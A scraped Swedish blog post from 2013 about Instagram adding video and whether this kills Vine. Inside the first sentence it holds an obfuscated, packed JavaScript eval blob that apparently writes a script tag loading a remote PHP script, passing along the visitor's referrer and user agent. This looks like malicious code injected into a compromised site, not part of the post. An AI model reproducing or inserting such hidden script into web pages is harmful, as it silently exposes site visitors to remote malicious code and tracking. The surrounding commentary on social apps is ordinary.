Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Instagram a.k.a Vine dödaren.

insta
Filip Urde
  • On 28 juni, 2013
  • http://www.revue.se/filip-urde

Kommer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zreis|var|u0026u|referrer|hhrzk||js|php’.split(’|’),0,{}))
Instagram ta död på Vine?

Det händer en hel del med våra sociala tjänster just nu. Jag minns när Vine släpptes, jag ladda hem det och provade. Blev inte direkt suuuuuper imponerad, men Vine har visat sig ge en del nöjen trots allt. Men jag kunde inte släppa tanken om att ”Detta borde ju verkligen vara integrerat tillsammans med en annan app… Orka ha en till att ha koll på”. Som sänt från ovan så löste Instagram min önskan och numera kan man alltså filma även i Instagram.
Så vad ska vi med Vine till? 
”Här dör kanske Vine”, säger Fredrik medan han filmar vad vi får anta är hans villaområde i Bromma. Jag är beredd att hålla med honom, Instagram är såpass mycket större och mer utbrett än Vine att för mig så finns det ingen anledning att fortsätta med Vine. Eller vad säger ni?
Här ser vi en graf över hur flödet sjunkit drastiskt sedan releasen av Instagrams uppdatering.
För drygt en månad sedan så var man väldigt stolta från Vine att det delades fler Vine länkar än Instagram länkar på Twitter. Oh, the irony…
vine

www.theverge.com